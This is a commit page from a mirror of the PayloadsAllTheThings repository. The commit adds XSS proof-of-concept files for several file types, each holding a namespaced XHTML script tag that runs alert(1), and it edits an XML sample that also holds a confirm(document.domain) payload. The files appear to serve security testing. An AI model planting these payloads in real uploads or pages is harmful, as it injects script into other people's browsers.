1
0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-09-21 20:51:36 +02:00

XSS in several filetype based on @__Mn1__ blogpost

This commit is contained in:
Swissky 2019-03-26 21:49:03 +01:00
parent 90b182f10f
commit bbc9029dd6
18 changed files with 18 additions and 1 deletions

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -0,0 +1 @@
<script>alert(1)</script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -0,0 +1 @@
<script>alert(1)</script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -0,0 +1 @@
<script>alert(1)</script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1337)</a:script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -2,7 +2,7 @@
<head></head> <head></head>
<body> <body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script> <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
<info> <info>
<name> <name>
<value><![CDATA[<script>confirm(document.domain)</script>]]></value> <value><![CDATA[<script>confirm(document.domain)</script>]]></value>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

View File

@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>